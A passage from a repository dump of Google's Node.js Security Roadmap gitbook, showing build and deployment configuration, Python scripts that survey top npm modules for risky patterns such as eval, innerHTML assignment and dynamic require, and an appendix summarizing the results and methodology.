Repository: google/node-sec-roadmap
Branch: master
Commit: 8e01b94ee2a7
Files: 84
Total size: 248.2 KB

Directory structure:
gitextract_n0lxbnc6/

├── .bookignore
├── .gitignore
├── .well-known/
│   └── security.txt
├── CONTRIBUTING.md
├── CONTRIBUTORS.md
├── LICENSE
├── Makefile
├── README.md
├── SUMMARY.md
├── app.yaml
├── appendix/
│   ├── .gitignore
│   ├── bad-pattern-grep/
│   │   └── experiment.py
│   ├── dyn-load/
│   │   └── experiment.py
│   ├── experiments.md
│   ├── jsconf/
│   │   ├── conformance_proto.textproto
│   │   └── experiment.py
│   ├── lazy-load/
│   │   └── experiment.py
│   ├── py_common/
│   │   ├── __init__.py
│   │   └── npm.py
│   ├── test-code/
│   │   └── experiment.py
│   ├── top100.txt
│   └── uses-scripts/
│       └── experiment.py
├── book.json.withcomments
├── chapter-1/
│   ├── recap.md
│   ├── threat-0DY.md
│   ├── threat-BOF.md
│   ├── threat-CRY.md
│   ├── threat-DEX.md
│   ├── threat-DOS.md
│   ├── threat-EXF.md
│   ├── threat-LQC.md
│   ├── threat-MTP.md
│   ├── threat-QUI.md
│   ├── threat-RCE.md
│   ├── threat-SHP.md
│   ├── threat-UIR.md
│   └── threats.md
├── chapter-2/
│   ├── bounded-eval.md
│   ├── bundling.md
│   ├── dynamism.md
│   ├── example/
│   │   ├── .gitignore
│   │   ├── graphs/
│   │   │   ├── filtered.dot
│   │   │   └── full.dot
│   │   ├── index.js
│   │   ├── lib/
│   │   │   ├── dynamic.js
│   │   │   ├── lazy.js
│   │   │   ├── opt2.js
│   │   │   └── static.js
│   │   ├── make_dep_graph.sh
│   │   ├── package.json
│   │   └── test/
│   │       └── test.js
│   ├── experiments/
│   │   └── webpack-compat/
│   │       ├── .gitignore
│   │       ├── goodbye.js
│   │       ├── hello.js
│   │       ├── index.js
│   │       ├── package.json
│   │       ├── test/
│   │       │   └── test.js
│   │       ├── test-utils.js
│   │       ├── test.sh
│   │       └── webpack.config.js
│   ├── source-contents.md
│   ├── synthetic-modules.md
│   └── what-about-eval.md
├── chapter-3/
│   └── knowing_dependencies.md
├── chapter-4/
│   └── close_dependencies.md
├── chapter-5/
│   └── oversight.md
├── chapter-6/
│   └── failing.md
├── chapter-7/
│   ├── child-processes.md
│   ├── examples/
│   │   ├── sh/
│   │   │   ├── index.js
│   │   │   ├── package.json
│   │   │   └── test/
│   │   │       └── test.js
│   │   └── sql/
│   │       ├── index.js
│   │       ├── package.json
│   │       └── test/
│   │           └── test.js
│   ├── libraries.md
│   ├── query-langs.md
│   └── structured-strings.md
├── cover.md
├── license.md
├── package.json
├── styles/
│   └── website.css
└── third_party/
    ├── __init__.py
    └── jslex/
        ├── __init__.py
        └── jslex.py

================================================
FILE CONTENTS
================================================

================================================
FILE: .bookignore
================================================
app.yaml
Makefile
book.json.withcomments
appendix/**/*.py
appendix/**/*.textproto
chapter-2/example/**/*.js
chapter-2/experiments/**/*.js
chapter-7/examples/**/*.js
CONTRIBUTING.md
**/*.sh
third_party
package.json
package-lock.json


================================================
FILE: .gitignore
================================================
# See appendix/experiments.md for how to run experiments.
appendix/jsconf/externs
appendix/tools
# Generated by `npm install`
node_modules
npm-debug.log
chapter-2/example/package-lock.json
# Generated by Makefile
www
deploy
.*.tstamp
#book.json  # Should be ignored but breaks gitbook
# Generated by `gitbook serve`
_book
# Emacs droppings
.\#*
*~
# Python droppings
*.pyc


================================================
FILE: .well-known/security.txt
================================================
Contact: mikesamuel@gmail.com
Acknowledgement: https://github.com/google/node-sec-roadmap/tree/master/CONTRIBUTORS.md


================================================
FILE: CONTRIBUTING.md
================================================
# How to Contribute

We'd love to accept your patches and contributions to this project. There are
just a few small guidelines you need to follow.

## Contributor License Agreement

Contributions to this project must be accompanied by a Contributor License
Agreement. You (or your employer) retain the copyright to your contribution;
this simply gives us permission to use and redistribute your contributions as
part of the project. Head over to <https://cla.developers.google.com/> to see
your current agreements on file or to sign a new one.

You generally only need to submit a CLA once, so if you've already
submitted one (even if it was for a different project), you probably
don't need to do it again.

## Code reviews

All submissions, including submissions by project members, require review. We
use GitHub pull requests for this purpose. Consult
[GitHub Help](https://help.github.com/articles/about-pull-requests/) for more
information on using pull requests.


================================================
FILE: CONTRIBUTORS.md
================================================
* [Ali Ijaz Sheikh](https://github.com/ofrobots)
* [Franziska Hinkelmann](https://github.com/fhinkel/)
* [Jen Tong](https://github.com/mimming)
* [John J. Barton](https://github.com/johnjbarton)
* [Justin Beckwith](https://github.com/JustinBeckwith)
* [Mark S. Miller](https://github.com/erights)
* [Mike Samuel](https://github.com/mikesamuel)
* [Myles Borins](https://github.com/mylesborins)

Special thanks for feedback and criticism:

* [Matteo Collina](https://github.com/mcollina)
* [Rich Trott](https://github.com/Trott)


================================================
FILE: LICENSE
================================================
Markdown and gitbook content is (C) Google LLC and is
made available under
https://creativecommons.org/licenses/by/4.0/


Code is available under the Apache 2.0 License
---------------------------------------------
Copyright 2017 Google LLC

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    https://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

================================================
FILE: Makefile
================================================
# This Makefile builds various versions of the Gitbook, runs
# sanity checks, and sets up a deployment directory.
#
# See `make help`

define HELP
Targets
=======
`make book`         puts HTML files under www/
`make pdf`          builds the PDF version
`make serve_static` serves the book from http://localhost:4000/
`make serve`        launches the builtin gitbook debug server
`make check`        runs sanity checks
`make deploy`       builds the deployment directory and runs checks

Setup
=====
This assumes that PATH includes
   https://github.com/gjtorikian/html-proofer
   https://calibre-ebook.com/download
and that the following environment variables point to reasonable values:
   HTML_PROOFER   # path to htmlproofer executable
   CALIBRE_HOME   # path to directory containing calibre executables

Deploying
=========
`make deploy` builds the deploy directory.
From that directory `gcloud app deploy --project node-sec-roadmap`
deploys to the canonical location if you have the right
privileges and have run `gcloud auth login`.
endef
export HELP


ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))

# External dependency used to detect dead links
ifeq ($(HTML_PROOFER),)
  HTML_PROOFER:=${HOME}/.gem/ruby/2.4.0/gems/html-proofer-3.8.0/bin/htmlproofer
  ifeq (,$(wildcard ${HTML_PROOFER}))
	HTML_PROOFER:=/bin/echo
  endif
endif

# External dependency used to build pdf
ifeq ($(CALIBRE_HOME),)
  CALIBRE_HOME:=/Applications/calibre.app/Contents/console.app/Contents/MacOS/
endif


# Bits that gitbook depends on
GITBOOK_DEPS := node_modules book.json cover.md SUMMARY.md CONTRIBUTORS.md \
		$(wildcard chapter-*/*.md) appendix/experiments.md \
		styles/website.css images/*


help:
	@echo "$$HELP"

book.json : book.json.withcomments
	@cat book.json.withcomments \
	| perl -ne 'print unless m/^[ \t]*#/' > book.json

pdf : www/node-sec-roadmap.pdf
www/node-sec-roadmap.pdf : $(GITBOOK_DEPS)
	PATH="${PATH}:./node_modules/.bin/:${CALIBRE_HOME}" \
	    ./node_modules/.bin/gitbook pdf . www/node-sec-roadmap.pdf

book : www/.book.tstamp
www/.book.tstamp : $(GITBOOK_DEPS)
	"${ROOT_DIR}"/node_modules/.bin/gitbook build . www
	@touch www/.book.tstamp

check : .check.tstamp
.check.tstamp : deploy/.deploy.tstamp
	touch .check.tstamp
	echo Checking that we correctly capitalize npm and Nodejs
	echo and that all Markdown link names are defined.
	@! find deploy/www/ -name \*.html \
	    | xargs egrep '\]\[|[nN][oO][dD][eE]J[sS]|\bN[Pp][Mm]\b' \
	    | egrep -v 'x\[a\]\[b\]|this\[x\]\[|[.]jfrog[.]com/'
	echo Checking for dead links
	@if [ "${HTML_PROOFER}" = "/bin/echo" ]; then \
		echo "Warning: HTML_PROOFER not available"; \
	else \
		echo Running htmlproofer; \
		"${HTML_PROOFER}" \
		  --alt-ignore=example/graphs/full.svg \
		  "${ROOT_DIR}"/deploy/www/; \
	fi
	@if [ -n "$$(find deploy -name node_modules)" ]; then \
	    echo "deploy/ should not include node_modules"; false; \
	fi

serve : $(GITBOOK_DEPS)
	"${ROOT_DIR}"/node_modules/.bin/gitbook serve

serve_static : book
	cd www && python -m SimpleHTTPServer 4000

clean :
	rm -rf www/ deploy/ _book/ book.json .*.tstamp

node_modules : package.json
	npm install --only=prod
	@touch node_modules/

deploy : deploy/.deploy.tstamp check
deploy/.deploy.tstamp : book pdf app.yaml
	rm -rf deploy/
	mkdir deploy/
	cp app.yaml deploy/
	cp -r www/ deploy/www/
	@touch deploy/.deploy.tstamp


================================================
FILE: README.md
================================================
# Node.js Security Roadmap

The security roadmap is a [gitbook](https://toolchain.gitbook.com/)
publication available at
*[nodesecroadmap.fyi](https://nodesecroadmap.fyi)*.

```sh
$ npm start
```

will serve the book via `localhost:4000`.

```sh
$ make help
```

will display help information about other options.

Please file errata at the
[issue tracker](https://github.com/google/node-sec-roadmap/issues)
or send us a pull request.

If you'd like to help out, please also see our
[contribution guidelines](CONTRIBUTING.md).


================================================
FILE: SUMMARY.md
================================================
# Summary

*  [Threat Environment](chapter-1/threats.md)
  *  [Zero Day](chapter-1/threat-0DY.md)
  *  [Buffer Overflow](chapter-1/threat-BOF.md)
  *  [Weak Crypto](chapter-1/threat-CRY.md)
  *  [Poor Developer Experience](chapter-1/threat-DEX.md)
  *  [Denial of Service](chapter-1/threat-DOS.md)
  *  [Exfiltration of Data](chapter-1/threat-EXF.md)
  *  [Low Quality Code](chapter-1/threat-LQC.md)
  *  [Malicious Third-Party Code](chapter-1/threat-MTP.md)
  *  [Query Injection](chapter-1/threat-QUI.md)
  *  [Remote Code Execution](chapter-1/threat-RCE.md)
  *  [Shell Injection during Production](chapter-1/threat-SHP.md)
  *  [Unintended Require](chapter-1/threat-UIR.md)
  *  [Recap](chapter-1/recap.md)
*  [Dynamism when you need it](chapter-2/dynamism.md)
  *  [Dynamic Bundling](chapter-2/bundling.md)
  *  [Production Source Lists](chapter-2/source-contents.md)
  *  [What about eval?](chapter-2/what-about-eval.md)
  *  [Synthetic Modules](chapter-2/synthetic-modules.md)
  *  [Bounded Eval](chapter-2/bounded-eval.md)
*  [Knowing your dependencies](chapter-3/knowing_dependencies.md)
*  [Keeping your dependencies close](chapter-4/close_dependencies.md)
*  [Oversight](chapter-5/oversight.md)
*  [When all else fails](chapter-6/failing.md)
*  [Library support for safe coding practices](chapter-7/libraries.md)
  *  [Query languages](chapter-7/query-langs.md)
  *  [Child processes](chapter-7/child-processes.md)
  *  [Structured strings](chapter-7/structured-strings.md)

----

*  [Appendix: Experiments](appendix/experiments.md)
*  [Contributors](CONTRIBUTORS.md)
*  [License](license.md)
*  [Errata](https://github.com/google/node-sec-roadmap/issues)


================================================
FILE: app.yaml
================================================
# cloud.google.com/appengine/docs/standard/python/config/appref
runtime: python27
api_version: 1
threadsafe: true

handlers:
- url: /
  static_files: www/index.html
  upload: www/index.html
  secure: always
  mime_type: text/html; charset=UTF-8
  expiration: 30m

- url: /(.*[.]html)$
  static_files: www/\1
  upload: www/(.*[.]html)$
  secure: always
  mime_type: text/html; charset=UTF-8
  expiration: 30m

- url: /(.*[.]css)$
  static_files: www/\1
  upload: www/(.*[.]css)$
  secure: always
  mime_type: text/css; charset=UTF-8
  expiration: 30m

- url: /(.*[.]js)$
  static_files: www/\1
  upload: www/(.*[.]js)$
  secure: always
  mime_type: text/javascript; charset=UTF-8
  expiration: 30m

- url: /(.*[.]json)$
  static_files: www/\1
  upload: www/(.*[.]json)$
  secure: always
  mime_type: application/json; charset=UTF-8
  expiration: 30m

- url: /(.*[.]txt)$
  static_files: www/\1
  upload: www/(.*[.]txt)$
  secure: always
  mime_type: text/plain; charset=UTF-8
  expiration: 30m

- url: /(.*[.]svg)$
  static_files: www/\1
  upload: www/(.*[.]svg)$
  secure: always
  mime_type: image/svg+xml; charset=UTF-8
  expiration: 30m

- url: /(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
  static_files: www/\1
  upload: www/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
  secure: always
  expiration: 30m

skip_files:
- ^(.*/)?#.*#$
- ^(.*/)?.*~$
- ^(.*/)?.*\.py[co]$
- ^(.*/)?.*/RCS/.*$
- ^(.*/)?\.(?!well-known(?:/|$)).*$


================================================
FILE: appendix/.gitignore
================================================
node_modules/**
separate-modules/**
**~
**.pyc


================================================
FILE: appendix/bad-pattern-grep/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""
Look for problematic patterns like calls to eval and assignments
to innerHTML that often lead to XSS when not consistently guarded.
"""

import py_common.npm
import re
import sys

_LEFT_BOUNDARY = r'(?<![.$_\w])'
_RIGHT_BOUNDARY = r'(?![.$_\w])'

_PATTERNS = (
    ('eval',
     re.compile(_LEFT_BOUNDARY + r'eval' + _RIGHT_BOUNDARY)),
    ('Function constructor',
     re.compile(_LEFT_BOUNDARY + r'new\s*Function' + _RIGHT_BOUNDARY)),
    ('innerHTML assignment',
     re.compile(r'[.]\s*(inner|outer)HTML\s*=')),
    ('URL property assignment',
     re.compile(r'[.]\s*(src|href)\s*=')),
)

def find_violations(node_modules, module_name):
    violations = []
    js_srcs = py_common.npm.js_srcs_almost_worst_case(node_modules, module_name)
    for (_, js_path) in js_srcs:
        content = py_common.npm.preprocess_js_content(file(js_path, 'r').read())
        for (rule_name, pattern) in _PATTERNS:
            for _ in pattern.finditer(content):
                violations.append(rule_name)
    return violations


if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    # Maps rule identifiers to sets of offending modules.
    rule_violations = {}

    module_count = 0
    for module_name in top100:
        violations = find_violations(node_modules, module_name)
        if 'Parse error' in violations or 'Argument list too long' in violations:
            pass
        else:
            module_count += 1
        for v in violations:
            if v in rule_violations:
                vmap = rule_violations[v]
            else:
                vmap = rule_violations[v] = {}
            vmap[module_name] = vmap.get(module_name, 0) + 1

    # TODO: exclude Parse error and Argument list too long

    print "## Grepping for Problems {#grep-problems}"
    print ""
    print "JS Conformance uses sophisticated type reasoning to find"
    print "problems in JavaScript code"
    print "(see [JS Conformance experiment](#jsconf))."
    print "It may not find problems in code that lacks type hints"
    print "or that does not parse."
    print ""
    print "Grep can reliably find a subset of the problems that"
    print "JS Conformance can identify."
    print ""
    print "If grep finds more instances of those problems than"
    print "JS Conformance does, then the code cannot be effectively"
    print "vetted by code quality tools like JS Conformance."
    print ""
    print "| Violation | Count of Modules | Total Count | Quartiles |"
    print "| --------- | ---------------- | ----------- | --------- |"
    for (v, vmap) in sorted(rule_violations.items()):
        count = 0
        total_count = 0
        values = vmap.values()
        for n in values:
            count += 1
            total_count += n
        values += [0] * (module_count - count)
        values.sort()
        quartiles = '%d / %d / %d' % (
            values[len(values) >> 2],
            values[len(values) >> 1],
            values[(len(values) * 3) >> 2],
        )
        print "| `%s` | %d | %d | %s |" % (
            v, count, total_count, quartiles)


================================================
FILE: appendix/dyn-load/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Looks for dynamic code loading patterns.

Patterns to identify include

  * require(...) where ... is not a string literal.
  * eval
  * Function(...) where there is more than one argument or the sole
    argument is not a function.

"""

import json
import os.path
import py_common.npm
import re
import shutil
import sys


dynamic_load_pattern = re.compile(
    r'(?<![_$\w.])require\s*\(\s*[^\s)\"\']'
#    r'(?<![_$\w.])require\s*(?:\(\s*[^\s)\"\']|[^\(])'  # To also match indirect uses of require, like aliasing it to a variable.
    )

def find_dynamic_load(node_modules, module_name):
    return py_common.npm.js_srcs_matching(
        node_modules, module_name, dynamic_load_pattern,
        module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))


if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    uses = 0
    total_count = 0
    has_dynamic_load = {}
    for module_name in top100:
        js_srcs = find_dynamic_load(node_modules, module_name)
        has_dynamic_load[module_name] = js_srcs
        if len(js_srcs):
            uses += 1
        total_count += 1

#    for k, v in has_dynamic_load.iteritems():
#        print "%s: %r" % (k, v)

    print (
"""
## Dynamic loads {#dynamic_load}

Dynamic loading can complicate code bundling.

%d of %d = %1.02f%% call `require(...)` without a literal string argument.
""" % (uses, total_count, (100.0 * uses) / total_count))


================================================
FILE: appendix/experiments.md
================================================
# npm Experiments

Below are summaries of experiments to check how compatible common npm
modules are with preprocessing, static checks, and other measures
to manage cross-cutting security concerns.


<!-- Begin generated summary -->

## Grepping for Problems {#grep-problems}

JS Conformance uses sophisticated type reasoning to find
problems in JavaScript code
(see [JS Conformance experiment](#jsconf)).
It may not find problems in code that lacks type hints
or that does not parse.

Grep can reliably find a subset of the problems that
JS Conformance can identify.

If grep finds more instances of those problems than
JS Conformance does, then the code cannot be effectively
vetted by code quality tools like JS Conformance.

| Violation | Count of Modules | Total Count | Quartiles |
| --------- | ---------------- | ----------- | --------- |
| `Function constructor` | 32 | 200 | 0 / 0 / 1 |
| `URL property assignment` | 35 | 471 | 0 / 0 / 3 |
| `eval` | 24 | 87 | 0 / 0 / 0 |
| `innerHTML assignment` | 17 | 81 | 0 / 0 / 0 |
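The boundary assertions in `bad-pattern-grep/experiment.py` keep these counts from including member accesses such as `obj.eval` or longer identifiers such as `evaluate`. The sketch below reuses those two boundary patterns verbatim; the `count_eval` helper is hypothetical and exists only to illustrate what the `eval` rule does and does not match.

```python
import re

# Boundary patterns copied from appendix/bad-pattern-grep/experiment.py:
# the name must not be preceded or followed by '.', '$', '_' or a word character.
_LEFT_BOUNDARY = r'(?<![.$_\w])'
_RIGHT_BOUNDARY = r'(?![.$_\w])'

EVAL_RE = re.compile(_LEFT_BOUNDARY + r'eval' + _RIGHT_BOUNDARY)


def count_eval(js_source):
    """Hypothetical helper: counts standalone references to `eval`."""
    return sum(1 for _ in EVAL_RE.finditer(js_source))


print(count_eval('eval(code)'))          # 1: bare call
print(count_eval('obj.eval(code)'))      # 0: member access
print(count_eval('evaluate(code)'))      # 0: longer identifier
print(count_eval('var f = eval; f(x)'))  # 1: aliasing is still counted
```

Because it is plain text matching, this approach works on code that JS Conformance cannot parse, but it cannot tell what value flows into the matched call.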

## Dynamic loads {#dynamic_load}

Dynamic loading can complicate code bundling.

33 of 108 = 30.56% call `require(...)` without a literal string argument.
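The count above comes from `dyn-load/experiment.py`, whose pattern flags a `require(` whose first argument does not begin with a quote character. The sketch below uses that same pattern; the `is_dynamic_require` helper is hypothetical. Note two consequences of the pattern: a concatenation that begins with a string literal, like `require('./' + name)`, is not flagged, while a template literal argument is flagged because only `'` and `"` are exempt.

```python
import re

# Pattern copied from appendix/dyn-load/experiment.py: `require(` not preceded
# by an identifier character or '.', whose first argument does not start
# with a quote character.
dynamic_load_pattern = re.compile(
    r'(?<![_$\w.])require\s*\(\s*[^\s)\"\']')


def is_dynamic_require(js_source):
    """Hypothetical helper: True if js_source has a non-literal require call."""
    return dynamic_load_pattern.search(js_source) is not None


print(is_dynamic_require("require('fs')"))         # False: string literal
print(is_dynamic_require("require(name)"))         # True: variable argument
print(is_dynamic_require("require('./' + name)"))  # False: starts with a literal
print(is_dynamic_require("module.require(name)"))  # False: preceded by '.'
```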

## JS Conformance {#jsconf}

JS Conformance identifies uses of risky APIs.

Some modules did not parse.  This may be due to TypeScript.
JSCompiler doesn't deal well with mixed JavaScript and TypeScript
inputs.

If a module is both in the top 100 and is a dependency of another
module in the top 100, then it will be multiply counted.

Out of 69 modules that parsed

| Violation | Count of Modules | Total Count | Quartiles |
| --------- | ---------------- | ----------- | --------- |
| `"arguments.callee" cannot be used in strict mode` | 2 | 3 | 0 / 0 / 0 |
| `Argument list too long` | 8 | 8 | 0 / 0 / 0 |
| `Illegal redeclared variable: ` | 2 | 9 | 0 / 0 / 0 |
| `Parse error.` | 31 | 232 | 0 / 0 / 2 |
| `This style of octal literal is not supported in strict mode.` | 4 | 11 | 0 / 0 / 0 |
| `Violation: Assigning a value to a dangerous property via setAttribute is forbidden` | 1 | 4 | 0 / 0 / 0 |
| `Violation: Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...` | 9 | 91 | 0 / 0 / 0 |
| `Violation: eval is not allowed` | 1 | 3 | 0 / 0 / 0 |
| `required "..." namespace not provided yet` | 7 | 30 | 0 / 0 / 0 |
| `type syntax is only supported in ES6 typed mode: ` | 3 | 132 | 0 / 0 / 0 |
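The Quartiles columns summarize per-module counts. In `bad-pattern-grep/experiment.py` they are computed by padding with zeros for modules that have no violations of a rule, sorting, and reporting the values at indices `n/4`, `n/2` and `3n/4` (integer division). This is why most quartiles read `0`: most modules have no violations of any one rule. A sketch of that calculation follows; the `quartiles` function name and the counts are made up for illustration.

```python
def quartiles(per_module_counts, module_count):
    """Mirrors the quartile calculation in appendix/bad-pattern-grep/experiment.py.

    per_module_counts maps module names to violation counts for one rule;
    modules absent from the map are treated as having zero violations.
    """
    values = list(per_module_counts.values())
    # Pad with zeros for modules that had no violations of this rule.
    values += [0] * (module_count - len(values))
    values.sort()
    n = len(values)
    return (values[n >> 2], values[n >> 1], values[(n * 3) >> 2])


# Illustrative data only: 3 of 8 modules violate the rule.
print('%d / %d / %d' % quartiles({'a': 5, 'b': 1, 'c': 2}, 8))  # 0 / 0 / 2
```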

## Lazy loads {#lazy_load}

Lazy loading can complicate code bundling if care is not taken.

71 of 108 = 65.74% contain a use of require inside a `{...}` block.
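The lazy-load experiment's source is not reproduced in this appendix, so the following is only a rough, hypothetical approximation of the idea: track brace depth while scanning, and flag a `require(` that appears at a depth greater than zero, for example inside a function body. It deliberately ignores strings, comments, template literals and regular expression literals, any of which can contain unbalanced braces, so it can misclassify real code.

```python
import re

# Same left boundary as the dyn-load pattern, so `obj.require(` is ignored.
_REQUIRE_CALL_RE = re.compile(r'(?<![_$\w.])require\s*\(')


def has_nested_require(js_source):
    """Hypothetical heuristic: True if some require( call sits inside {...}.

    Naive on purpose: braces inside strings, comments, template literals and
    regex literals are counted as if they were code.
    """
    depth = 0
    depth_at = []  # depth_at[i] is the brace depth just before character i
    for ch in js_source:
        depth_at.append(depth)
        if ch == '{':
            depth += 1
        elif ch == '}':
            depth = max(0, depth - 1)
    return any(depth_at[m.start()] > 0
               for m in _REQUIRE_CALL_RE.finditer(js_source))


print(has_nested_require("const fs = require('fs');"))                 # False
print(has_nested_require("function load() { return require('fs'); }"))  # True
```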


## Prod bundle includes test code {#test_code}

Some of the top 100 modules are test code, e.g. mocha, chai.
This measures which modules, when installed with `--only=prod`,
include test patterns.

50 of 108 = 46.30% contain test code patterns
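The exact patterns used by the test-code experiment are not shown in this appendix. As an illustration only, a path-based heuristic might flag files under directories named `test`, `tests` or `__tests__`, or files whose names end in `.test.js` or `.spec.js`. Those conventions, and both helper names below, are assumptions, not the experiment's actual rules.

```python
import re

# Assumed conventions for test files; NOT the experiment's actual patterns.
_TEST_PATH_RE = re.compile(r'(^|/)(tests?|__tests__)/|[.](test|spec)[.]js$')


def looks_like_test_file(relative_path):
    """True if a path inside a package looks like test code by convention."""
    return _TEST_PATH_RE.search(relative_path) is not None


def module_has_test_code(relative_paths):
    """True if any installed file of a module looks like test code."""
    return any(looks_like_test_file(p) for p in relative_paths)


print(module_has_test_code(['index.js', 'lib/util.js']))         # False
print(module_has_test_code(['index.js', 'test/index.test.js']))  # True
```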


## Uses Scripts {#uses_scripts}

Unless steps are taken, installation scripts run code on
a developer's workstation with the developer's privileges,
including write access to local repositories.  If this number
is small, having humans review installation scripts before
running them might be feasible.

4 of 979 = 0.41% use installation scripts
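npm runs the `preinstall`, `install` and `postinstall` lifecycle scripts from a package's `package.json` during installation, which is why the methodology installs with `--ignore-scripts`. (If a package has a `binding.gyp` file and defines no `install` or `preinstall` script, npm also defaults to building it with node-gyp.) The `uses-scripts` experiment is not reproduced here; a minimal sketch of one way to check a manifest, using a hypothetical `uses_install_scripts` helper that only inspects the `scripts` field, is:

```python
import json

# Lifecycle scripts that npm runs when a package is installed.
INSTALL_SCRIPT_NAMES = ('preinstall', 'install', 'postinstall')


def uses_install_scripts(package_json_text):
    """Hypothetical check over the text of a package.json file.

    Ignores npm's implicit node-gyp build for packages with binding.gyp.
    """
    manifest = json.loads(package_json_text)
    scripts = manifest.get('scripts') or {}
    return any(name in scripts for name in INSTALL_SCRIPT_NAMES)


print(uses_install_scripts('{"scripts": {"test": "mocha"}}'))             # False
print(uses_install_scripts('{"scripts": {"postinstall": "node s.js"}}'))  # True
```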


<!-- End generated summary -->


## Methodology

The code is [available on GitHub][code].

```bash
$ npm --version
3.10.10
```

### Top 100 Module list

I extracted `top100.txt` by browsing to the most depended-upon
[package list][top100] and running the below in the dev console until
I had >= 100 entries.

```js
var links = document.querySelectorAll('a.name');
var top100 = Object.create(null);
for (var i = 0; i < links.length; ++i) {
  var link = links[i];
  var packageName = link.getAttribute('href').replace(/^.*\/package\//, '');
  top100[packageName] = true;
}
var top100Names = Object.keys(top100);
top100Names.sort();
top100Names
```

----

We also require some tools so that we can run JSCompiler against
node modules.  From the `appendix` directory:

```sh
mkdir tools
curl https://dl.google.com/closure-compiler/compiler-latest.zip \
     > /tmp/closure-latest.zip
pushd tools
  jar xf /tmp/closure-latest.zip
popd
pushd jsconf
  mkdir externs
  pushd externs
    git clone https://github.com/dcodeIO/node.js-closure-compiler-externs.git
  popd
popd
```
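`jsconf/experiment.py` looks for the compiler at `tools/closure-compiler-latest/closure-compiler.jar` next to the `node_modules` directory, and reads externs from `jsconf/externs`. If the unzipped archive uses a different layout, the experiment fails with a less obvious error, so a quick check can help. A minimal sketch, where `missing_tools` is a hypothetical helper and the paths are taken from `jsconf/experiment.py`:

```python
import os.path


def missing_tools(appendix_dir):
    """Returns the expected tool paths that do not exist under appendix_dir."""
    expected = (
        # Jar path used by run_jsconf in appendix/jsconf/experiment.py.
        os.path.join(appendix_dir, 'tools', 'closure-compiler-latest',
                     'closure-compiler.jar'),
        # Externs directory scanned by appendix/jsconf/experiment.py.
        os.path.join(appendix_dir, 'jsconf', 'externs'),
    )
    return [path for path in expected if not os.path.exists(path)]


for path in missing_tools('.'):
    print('missing: %s' % path)
```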


### Experiments

Each experiment corresponds to a directory with an executable
`experiment.py` file which takes a `node_modules` directory, a
`separate-modules` directory, and the top 100 module list, and
which outputs a snippet of Markdown.
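A new experiment only needs to follow that calling convention and be executable, since the run loop invokes each `experiment.py` directly. A minimal skeleton, written for Python 3 (the existing experiments use Python 2 `print` statements), where `module_is_interesting` and the `my_experiment` heading are hypothetical placeholders:

```python
#!/usr/bin/env python3
import sys


def module_is_interesting(node_modules, module_name):
    """Hypothetical placeholder for the property being measured."""
    return False


def summarize(node_modules, top100):
    """Formats a Markdown snippet in the style of the summaries above."""
    hits = sum(1 for name in top100 if module_is_interesting(node_modules, name))
    total = len(top100)
    return ('## My experiment {#my_experiment}\n\n'
            '%d of %d = %1.02f%% have the property.\n'
            % (hits, total, (100.0 * hits) / total))


if __name__ == '__main__':
    # Same argument order as the existing experiments.
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]
    with open(top100_txt) as f:
        top100 = [line for line in f.read().split('\n') if line]
    print(summarize(node_modules, top100))
```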

Running

```bash
cat top100.txt | xargs npm install --ignore-scripts --only=prod
mkdir separate-modules
cd separate-modules
for pn in $(cat ../top100.txt ); do
  mkdir -p "$pn"
  pushd "$pn"
  npm install -g --prefix="node_modules/$pn" --ignore-scripts --only=prod "$pn"
  popd
done
```

pulls down the list of node modules.  As of this writing, there are 980
modules that are in the top100 list or are direct or indirect prod
dependencies thereof.
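That count is the transitive closure of the top 100 list under production dependencies. As a sketch, assuming the `dependencies` map of each installed `package.json` has already been loaded into a dictionary, a breadth-first search computes the closure. The `prod_closure` helper and the sample graph are hypothetical, and packages are counted by name, so several installed versions of one package count once.

```python
from collections import deque


def prod_closure(roots, dependencies):
    """Returns every package reachable from roots via prod dependencies.

    dependencies maps a package name to an iterable of the names it depends on.
    Packages missing from the map are treated as having no dependencies.
    """
    seen = set(roots)
    queue = deque(roots)
    while queue:
        name = queue.popleft()
        for dep in dependencies.get(name, ()):
            if dep not in seen:
                seen.add(dep)
                queue.append(dep)
    return seen


# Made-up dependency graph for illustration.
deps = {'a': ['b', 'c'], 'b': ['d'], 'e': ['b']}
print(sorted(prod_closure(['a', 'e'], deps)))  # ['a', 'b', 'c', 'd', 'e']
```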

To run the experiments and place the outputs under `/tmp/mds/`, run

```bash
mkdir -p /tmp/mds/
export PYTHONPATH="$PWD:$PWD/../third_party:$PYTHONPATH"
for f in *; do
  if [ -f "$f"/experiment.py ]; then
    "$f"/experiment.py node_modules separate-modules top100.txt \
    > "/tmp/mds/$f.md"
  fi
done
```

Concatenating those markdown snippets produces the summary above.

```bash
# Shell globs expand in sorted order, so the snippets are concatenated alphabetically.
